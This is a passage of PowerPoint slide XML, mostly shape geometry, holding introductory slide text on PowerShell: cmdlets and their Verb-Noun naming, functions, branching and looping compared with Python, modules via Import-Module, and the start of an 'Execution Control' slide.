              <a:cs typeface="Courier New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280915" y="5173992"/>
            <a:ext cx="7717790" cy="3438525"/>
            <a:chOff x="4280915" y="5173992"/>
            <a:chExt cx="7717790" cy="343852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80915" y="5173992"/>
              <a:ext cx="7717536" cy="45413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326635" y="5219700"/>
              <a:ext cx="7603490" cy="340360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7603490" h="340360">
                  <a:moveTo>
                    <a:pt x="7509890" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93344" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57007" y="7334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27336" y="27336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7334" y="57007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="93345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="339851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7603236" y="339851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7603236" y="93345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7595901" y="57007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7575899" y="27336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7546228" y="7334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7509890" y="0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80915" y="8421623"/>
              <a:ext cx="7717536" cy="19042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326635" y="8467344"/>
              <a:ext cx="7603490" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7603490" h="76200">
                  <a:moveTo>
                    <a:pt x="7603235" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7603235" y="76199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7603235" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D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1821560" y="2996564"/>
            <a:ext cx="12563475" cy="1977389"/>
            <a:chOff x="1821560" y="2996564"/>
            <a:chExt cx="12563475" cy="1977389"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1841753" y="3006089"/>
              <a:ext cx="4320540" cy="547370"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="547370">
                  <a:moveTo>
                    <a:pt x="4229354" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="91185" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55667" y="7157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26685" y="26685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7157" y="55667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="547115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="547115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="91186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4313382" y="55667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4293854" y="26685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4264872" y="7157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4229354" y="0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841753" y="3006089"/>
              <a:ext cx="4320540" cy="547370"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="547370">
                  <a:moveTo>
                    <a:pt x="91185" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4229354" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4264872" y="7157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4293854" y="26685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4313382" y="55667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="91186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="547115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="547115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7157" y="55667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26685" y="26685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55667" y="7157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91185" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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831085" y="3473957"/>
              <a:ext cx="12544425" cy="1490980"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1490979">
                  <a:moveTo>
                    <a:pt x="12421616" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122427" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74795" y="9628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35877" y="35877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9628" y="74795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="122427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1368043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9628" y="1415676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35877" y="1454594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74795" y="1480843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122427" y="1490471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12421616" y="1490471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469248" y="1480843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508166" y="1454594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534415" y="1415676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1368043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="122427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534415" y="74795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508166" y="35877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469248" y="9628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124216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831085" y="3473957"/>
              <a:ext cx="12544425" cy="1490980"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1490979">
                  <a:moveTo>
                    <a:pt x="0" y="122427"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9628" y="74795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35877" y="35877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74795" y="9628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122427" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12421616" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469248" y="9628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508166" y="35877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534415" y="74795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="122427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1368043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534415" y="1415676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508166" y="1454594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469248" y="1480843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12421616" y="1490471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122427" y="1490471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74795" y="1480843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35877" y="1454594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9628" y="1415676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1368043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="122427"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="04668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1744217" y="1882292"/>
            <a:ext cx="13174980" cy="27978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574030" marR="5080" indent="-5561965">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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PowerShell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is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preferred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method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performing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Windows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administration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tasks.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Some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elements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 of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PowerShell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are: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Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="294005">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Cmdlets</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2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22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>functions</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="637540" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2105"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="636905" algn="l"/>
                <a:tab pos="637540" algn="l"/>
              </a:tabLst>
            </a:pP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Cmdlets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use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Verb-Noun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naming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convention.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="637540" indent="-343535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636905" algn="l"/>
                <a:tab pos="637540" algn="l"/>
              </a:tabLst>
            </a:pP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Cmdlets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always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return</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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object.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="637540" indent="-343535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636905" algn="l"/>
                <a:tab pos="637540" algn="l"/>
              </a:tabLst>
            </a:pP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Custom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functions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declared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within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curly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brackets.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70067" y="306451"/>
            <a:ext cx="55168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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Environment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83608" y="760476"/>
            <a:ext cx="7415784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810892" y="2474976"/>
            <a:ext cx="12563475" cy="1560195"/>
            <a:chOff x="1810892" y="2474976"/>
            <a:chExt cx="12563475" cy="1560195"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1831847" y="2474976"/>
              <a:ext cx="4319270" cy="502920"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="502919">
                  <a:moveTo>
                    <a:pt x="4235196" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="83819" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51167" y="6578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24526" y="24526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6578" y="51167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="83820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="502920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="502920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="83820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312437" y="51167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4294489" y="24526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4267848" y="6578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4235196" y="0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820417" y="2945130"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="12455270" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124552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820417" y="2945130"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="04668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015744" y="2511298"/>
            <a:ext cx="11033125" cy="13011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85">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Logi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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an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Lo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pi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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7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Stat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ements</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2125"/>
              </a:spcBef>
            </a:pP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PowerShell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supports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wider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range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branching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looping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structures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than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Python,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including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switch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do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statements.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810892" y="5067300"/>
            <a:ext cx="12563475" cy="1560195"/>
            <a:chOff x="1810892" y="5067300"/>
            <a:chExt cx="12563475" cy="1560195"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1831847" y="5067300"/>
              <a:ext cx="4319270" cy="544195"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="544195">
                  <a:moveTo>
                    <a:pt x="4228338" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="90677" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55399" y="7131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26574" y="26574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7131" y="55399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="90677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="544067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="544067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="90677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4311884" y="55399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4292441" y="26574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4263616" y="7131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4228338" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0466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820417" y="5537454"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="12455270" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124552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820417" y="5537454"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="04668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2015744" y="5136261"/>
            <a:ext cx="12048490" cy="13093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Modules</a:t>
            </a:r>
            <a:endParaRPr sz="2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175"/>
              </a:spcBef>
            </a:pP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PowerShell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also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used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with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many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modules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added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script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using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Import-</a:t>
            </a:r>
            <a:endParaRPr sz="2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Module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cmdlet.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35928" y="306451"/>
            <a:ext cx="31857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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-12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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Control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69508" y="760476"/>
            <a:ext cx="4320540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847469" y="3555491"/>
            <a:ext cx="12563475" cy="1970405"/>
            <a:chOff x="1847469" y="3555491"/>
            <a:chExt cx="12563475" cy="1970405"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1868424" y="3555491"/>
              <a:ext cx="4319270" cy="661670"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="661670">
                  <a:moveTo>
                    <a:pt x="4208780" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="110236" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67347" y="8669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32305" y="32305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8669" y="67347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="110236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="661416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="661416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="110236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310346" y="67347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4286710" y="32305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4251668" y="8669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4208780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856994" y="4025645"/>
              <a:ext cx="12544425" cy="1490980"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1490979">
                  <a:moveTo>
                    <a:pt x="12421616" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
